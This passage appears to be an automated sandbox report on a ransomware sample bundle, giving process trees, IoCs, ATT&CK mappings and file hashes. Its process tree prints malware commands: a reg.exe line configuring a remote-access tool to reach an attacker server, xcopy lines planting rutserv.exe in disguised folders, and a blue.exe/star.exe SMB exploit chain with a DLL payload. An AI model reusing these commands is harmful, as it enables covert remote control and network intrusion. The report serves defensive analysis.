1008	mmkt.exe
1008	mmkt.exe
1008	mmkt.exe
1008	mmkt.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
2720	taskmgr.exe
2828	rutserv.exe
2828	rutserv.exe
2828	rutserv.exe
2828	rutserv.exe
2720	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeRestorePrivilege	1236	7zFM.exe
Token: 35	1236	7zFM.exe
Token: SeSecurityPrivilege	1236	7zFM.exe
Token: SeDebugPrivilege	2720	taskmgr.exe
Token: SeDebugPrivilege	1008	mmkt.exe
Token: SeDebugPrivilege	2176	Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
Token: SeDebugPrivilege	2428	HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
Token: SeDebugPrivilege	1652	rutserv.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
1236	7zFM.exe
1236	7zFM.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe

Suspicious use of SendNotifyMessage 41 IoCs

pid	Process
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
2828	rutserv.exe
2828	rutserv.exe
2828	rutserv.exe
2828	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2856 wrote to memory of 2428	2856	cmd.exe	34
PID 2856 wrote to memory of 2428	2856	cmd.exe	34
PID 2856 wrote to memory of 2428	2856	cmd.exe	34
PID 2856 wrote to memory of 2428	2856	cmd.exe	34
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 2176	2856	cmd.exe	35
PID 2856 wrote to memory of 1620	2856	cmd.exe	36
PID 2856 wrote to memory of 1620	2856	cmd.exe	36
PID 2856 wrote to memory of 1620	2856	cmd.exe	36
PID 2856 wrote to memory of 1620	2856	cmd.exe	36
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 2396	2856	cmd.exe	37
PID 2856 wrote to memory of 1032	2856	cmd.exe	38
PID 2856 wrote to memory of 1032	2856	cmd.exe	38
PID 2856 wrote to memory of 1032	2856	cmd.exe	38
PID 2856 wrote to memory of 1032	2856	cmd.exe	38
PID 2856 wrote to memory of 1524	2856	cmd.exe	39
PID 2856 wrote to memory of 1524	2856	cmd.exe	39
PID 2856 wrote to memory of 1524	2856	cmd.exe	39
PID 2856 wrote to memory of 1524	2856	cmd.exe	39
PID 2856 wrote to memory of 3060	2856	cmd.exe	40
PID 2856 wrote to memory of 3060	2856	cmd.exe	40
PID 2856 wrote to memory of 3060	2856	cmd.exe	40
PID 2856 wrote to memory of 3060	2856	cmd.exe	40
PID 1032 wrote to memory of 1008	1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe	41
PID 1032 wrote to memory of 1008	1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe	41
PID 1032 wrote to memory of 1008	1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe	41
PID 1032 wrote to memory of 1008	1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe	41
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 2396 wrote to memory of 1716	2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe	43
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 588	1716	Creator.exe	44
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 984	1716	Creator.exe	46
PID 1716 wrote to memory of 1872	1716	Creator.exe	49
PID 1716 wrote to memory of 1872	1716	Creator.exe	49
PID 1716 wrote to memory of 1872	1716	Creator.exe	49
PID 1716 wrote to memory of 1872	1716	Creator.exe	49
PID 1716 wrote to memory of 1872	1716	Creator.exe	49

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00323.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2856
- C:\Users\Admin\Desktop\00323\HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
  HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
  Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
  Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1620
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
  Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:2396
- - C:\ProgramData\Creator.exe
    "C:\ProgramData\Creator.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1716
  - - C:\Windows\SysWOW64\xcopy.exe
      "C:\Windows\System32\xcopy.exe" C:\ProgramData\rutserv.exe C:\ProgramData\Recovery\rutadmin\ /I /Y /C
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:588
  - - C:\Windows\SysWOW64\xcopy.exe
      "C:\Windows\System32\xcopy.exe" C:\ProgramData\rutserv.exe C:\ProgramData\Oracle\Java\ /I /Y /C
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:984
  - - C:\Windows\SysWOW64\xcopy.exe
      "C:\Windows\System32\xcopy.exe" C:\ProgramData\RutservUpdate.exe C:\ProgramData\User\Data\ /I /Y /C
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:1872
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" add "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /v InternetId /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223638303031223e3c696e7465726e65745f69643e3735392d3836392d3032312d3938383c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3138352e3230332e3234332e3131373c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e747275653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1176
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" import id.reg
      4⤵
      System Location Discovery: System Language Discovery
      PID:2544
  - - C:\ProgramData\offdll32.exe
      "C:\ProgramData\offdll32.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2164
  - - C:\ProgramData\Recovery\rutadmin\rutserv.exe
      "C:\ProgramData\Recovery\rutadmin\rutserv.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1652
    - - C:\ProgramData\Recovery\rutadmin\rutserv.exe
        
        C:\ProgramData\Recovery\rutadmin\rutserv.exe -second
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2828
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
  Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Users\All Users\mmkt.exe
    "C:\Users\All Users\mmkt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- - C:\Satan.exe
    "C:\Satan.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1928
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp 10.127.0.131 & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 10.127.0.131
    3⤵
    PID:4048
  - - C:\Users\ALLUSE~1\blue.exe
      blue.exe --TargetIp 10.127.0.131
      4⤵
      PID:3764
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe
  Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:1524
- - C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k
    3⤵
    PID:4356
- C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe
  Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:3060

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-3692679935-4019334568-335155002-1000\desktop.ini

Filesize
129B

MD5
102809ec948569f9f6975c03d7e3e689

SHA1
6c0be287ad1d680ea9593c3266cb9d5f1a073a2b

SHA256
aaf90b204a8909085e56a7783b67b9bb241cb8b95c9106d5ddea17765eab10ef

SHA512
5bea7ba76f2d00a2cdac3135b92e65b1a224a7a57b63b0d64d9f1826c30e73ab967b39275170f4367d3eb30b625e3f1be9aa10910fc6748f92e443bf2fdf8284

Download Submit
C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

Filesize
919B

MD5
ab648e0637653c4b85d389a94da7fa3c

SHA1
fcb4d062c92f693c3e46c9f6445bc7ee6b725452

SHA256
2ac96118520d95540461c913d998b67b678e440a8b1daa5c7a672664a83ec625

SHA512
76dbde17fe997616ee74891f88a7cfdb29c3d9026db22775add0d0f9f66216b654cdba7221980580ef3c9a2520a8021afbc45d2b3433c9a7e919b415305ea13f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\msvcr100.dll

Filesize
809KB

MD5
bbd34f7620045187b0624060991ed151

SHA1
7f0ce743c823363f5cd557e6562b55b04335bbb7

SHA256
4bbcfdafb0288967acb35b53ffcbf82f2caa1408d28c69df8377516c7e6cdcf4

SHA512
43300197615d50772d0260d2176eae336ac8b19a157b049525bc5acbab60346540b2caec77d72524dd9aca7c78701475aea9ed06400b905a58e56361d4c7ce68

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif

Filesize
153B

MD5
2f38fde4fddc9974b3db43be1e20a365

SHA1
89899b1a8172310acdc01ae400de1748235efbc2

SHA256
9682fbd27ef797c15e1fc37405b9ce236de578cc651748bf211e434df2a208f5

SHA512
0736d7798a96bc8fe32cb4670e5a9e063c9784135c2d6b7094e5f34d1ffbff978dad1f0d3f4246ec4ac9c367667595fa17a3508faf491107f9a57707edba0851

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
12KB

MD5
bc351ac137cd5c384dba71c91065b92c

SHA1
aeddd70582816a5eb66e252e5da430ab020c5ccf

SHA256
670747d2fc069bcbdaa0edaac69fe7a1cefd39290912ba5ae0c10fae93f5883a

SHA512
70451e6860d3b4fd58bee007bcb6aab973d23252c0ed28547dbf698f8dbb24e656afb115c4b6f87eb88e37a8d5389c804666391d3bc01aeacf149d77123e49de

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
8KB

MD5
d5127276a2f6f25d3d0953f2ffce0763

SHA1
0a207a358c477c6e4b0156058bba61b7d0e99eb3

SHA256
178c10444eb6c177226082f6ba40e235be9ecd2416920e96a823b57aa914285f

SHA512
00db47ff57c5397c757617e7e34b12797b2dde839f614d01bb4a91a890da4a65c683b3707cab6fd2147e573387cafc3d16bc5012c561732490a0a9f45a47820a

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

Filesize
11KB

MD5
b781ef33b1bff6593f8ef654a219f727

SHA1
ee05c3894022707eb9414ba3609af8160cde275d

SHA256
a8d7d58b32ed73d46e5269fc50d7cdfe340122491cf454341bd87b8256a77371

SHA512
c40084dc49203bae362f864173ec7b948bfe7e565dcb7be0aaee02fefbcf170297d1dbfa07016635a545a71e3be117b161f97da5849ac3d80a85d19e32122046

Download Submit
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

Filesize
109KB

MD5
b727c3f01bdd9c6b981e4356be2d5962

SHA1
cb3c307af268235f576f352928948aaf0e48d847

SHA256
c7056012c0dc115108d48c98e8f7b2934e42889a40e1aabc12d899e40176630e

SHA512
3a5668fc0f4fc4da7fba9b3a553854b60d9b951da28cd48441fa26182fd77a141c808060b9f1dc8843ea99ca73ea8d857af2e8e09eaa4f6329b2a1bbd249f44e

Download Submit
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

Filesize
172KB

MD5
4f7a2f2f588687e86822bc8d4048709c

SHA1
149f28b9b97fb5a9eb6df8914a309bda5c8924ac

SHA256
06ba2011a05f5e18fd0a5ef6ac6d815d26ce1ce1f67241c6e335f1c4c505005c

SHA512
70f9b2e2ddaf15c9242d423e39a2b8d74845152a0e28a072ab0b24de90ffa6d42821780abf2f12933050258884bbb713110e7bc88b1011df689e46767e7a2f34

Download Submit
C:\ProgramData\RutservUpdate.exe

Filesize
134KB

MD5
336050e45258c5fb018ccf3bcf18782c

SHA1
204eec7f9af1d26fe50e23d653fcf05e77ae83a5

SHA256
5824806fe9d46c4fdd30023cd7b60a43858cb6a1dd35298471e91dd2837c42cc

SHA512
9e115536e335618f571e1fd2e4dfc6ab72e35f5b2e2cbd9146fbe29def8e97e82d2b689620e47d845fae2b6749733a5008efece9330f507c268aee99a7552b74

Download Submit
C:\ProgramData\blue.exe

Filesize
126KB

MD5
8c80dd97c37525927c1e549cb59bcbf3

SHA1
4e80fa7d98c8e87facecdef0fc7de0d957d809e1

SHA256
85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5

SHA512
50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e

Download Submit
C:\ProgramData\blue.xml

Filesize
7KB

MD5
f56025565de4f53f5771d4966c2b5555

SHA1
b22162a38cdd4b85254b6c909a9e5210711d77af

SHA256
ea7caa08e115dbb438e29da46b47f54c62c29697617bae44464a9b63d9bddf18

SHA512
1cbb2f9f750faf009b9cc5831205db3aa2271fcc3cb37c126a8ef093a039bde8ad699e6a9f7dbb1ce91ab9e90ac5c14d0ad2d97cca21ee7ab4c1cc6b6832e3b2

Download Submit
C:\ProgramData\offdll32.exe

Filesize
81KB

MD5
4f5693d0209bd2234bf116a2dcfcec8d

SHA1
29015069a08ca830478faba4b0b127a34710a43c

SHA256
2322f852e2d3f92e09167f33b4f696165ac1f8e2caf3088e1b2be617bec5a3dd

SHA512
8399da5f81bd206e1f2f4bda617efd4d0927e42aa0750d7bff54f07ad3eef279a197a610448c19239e854fafa18e35848cab4540269d341a5e5ead40ca101417

Download Submit
C:\ProgramData\rutserv.exe

Filesize
8.7MB

MD5
50e132af6e2ce1c20856d9d80a0b4445

SHA1
37d58bc01c0b25896375134008f35d6984c644be

SHA256
04673ee0a6dc22162a330b27c79bfe663255461c5862a907296f6c2701be2d7a

SHA512
f312af07612cf0de30ba3e77eea11d37338515f616fdd544e1b8ecffb02eb5c3f31406329871c5493264d7e40047b35f6392cc39482de498c295b3fbca3844d3

Download Submit
C:\Satan.exe

Filesize
143KB

MD5
15b8514837bae0a32d313e1086515120

SHA1
f453bc1ea90106b8b97dd8abd55dd4c81ac303d3

SHA256
d02761e61d72fe98c0f1614124996af332ad2905690391573d2f0608bf1da63d

SHA512
4f85367e00908f8c2a4c0445ab2415e2eac70244b6a8bfd5f04901e7fa5fd8f7c6e3386cb4edb07a6a145de1c2f7d51f2e9e46426f603fbfb0bf4d0ca963efaf

Download Submit
C:\Users\Admin\Desktop\00323\HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe

Filesize
9.2MB

MD5
95b30e0bc13aafd0d5a66cc870b62b03

SHA1
e0a6a2195488dbc9c59358c16362aa67bcc7e666

SHA256
2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698

SHA512
d8aa8cad27279dc9fc50c7c82b784c99b0e206b6b94bd1edc935d11dcab2f2eb772093ea69577c6c36e2b4796d619147037eb3a16bf17ab278642e2f6ec361f8

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe

Filesize
261KB

MD5
7d80230df68ccba871815d68f016c282

SHA1
e10874c6108a26ceedfc84f50881824462b5b6b6

SHA256
f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b

SHA512
64d02b3e7ed82a64aaac1f74c34d6b6e6feaac665ca9c08911b93eddcec66595687024ec576e74ea09a1193ace3923969c75de8733859835fef45335cf265540

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe

Filesize
346KB

MD5
99df60e4e6bd3497f40736a408dd0a46

SHA1
d02937c29a00c4d15fbcb19a9afd85a9ad3fce6b

SHA256
4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f

SHA512
aa902f62c05b5682209459d354dc70d243125612fff1000879b5ee0d32b58c8b503a140942376483ad41de4c4d29502bf3f3f92a4a910418f9af3b5cf6671f32

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe

Filesize
3.8MB

MD5
cb999e53f46b92529b5ab89522c1f2f3

SHA1
dbbe7299bb1ce609a8406938e3b1216733894023

SHA256
89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574

SHA512
6216c5d9392cc87293137efc437b5dee6fd5c51d8301561b73c7347bdc4023584b704b6849547906c4b6769397e8116f5e457ea84e85543847ba05cb7e2b3d4c

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe

Filesize
2.4MB

MD5
6e44abb2b449dd0bcadf8b0316590d0e

SHA1
332b18785c716091e0dd8e3fa94340fbfb909b93

SHA256
1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd

SHA512
14ba742a4904bb966223006c4f453de5f0a85148910a0f6ead28323a0d106bfb75042458271b3349ceaf416c3a6010fa9edd3f0f4fa388e4c186e3cea25e4187

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe

Filesize
557KB

MD5
e56b3acd2807566e84e75be33241f39b

SHA1
7dc539eed6e12f131b2bef53dde443dca10d032e

SHA256
f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200

SHA512
92915f45cc90d0a841132dfe203ca21659b52641112c3af384084dbf9d4ca0bbe01b6fd53d2af0b8dda5db1a678f4745225aa9c9fb60bd5e3f53b619d9f591a9

Download Submit
C:\Users\Admin\Desktop\00323\Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe

Filesize
578KB

MD5
76856dcf9c8f295e1fdfbcd56395a1c4

SHA1
b3e6c0d2b3d227d842644a38d872a4978adc594d

SHA256
9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4

SHA512
da8aeb25cb5f2d069451035a02b339575629634fc80feef269819df92ff65b72ee4b2fb931e497470f57be46688409c050ddc087357020628483edca92148d92

Download Submit
C:\Users\All Users\uname

Filesize
21B

MD5
8bb001ad1da746851b6724de8c78d37e

SHA1
ce718e040a87289b21a254df474b2da9d8cb8c9c

SHA256
68c368f677aa42a63a8a7a2865a31b6359db76179667814867bef528d99e94f3

SHA512
5904bd71d89bfa5b81a9d303ad90421d7d5bfe875cf107329053b1650243cde752689b824984eb87c00b696d091c02ba62e3fc082ea45385240f69ad0c62eb26

Download Submit
C:\Users\All Users\upass

Filesize
39B

MD5
4e9679274251a3f8ebca313c876ef561

SHA1
3472c481503539dcf9c412622be392307d4dcb8e

SHA256
9dcc0619728944d2ea574d8698ae8c3f1527df05fa0a1255f3c2dadf7bd35a28

SHA512
bf1e8c94bcb30b3a8845549c92fffee52ccdae80b1825eb645f0cd802997e060af2e730cf57bd88ea1aa256952b23f7e0791389b40fe11f71ff728d097601cd7

Download Submit
\??\c:\ProgramData\id.reg

Filesize
27KB

MD5
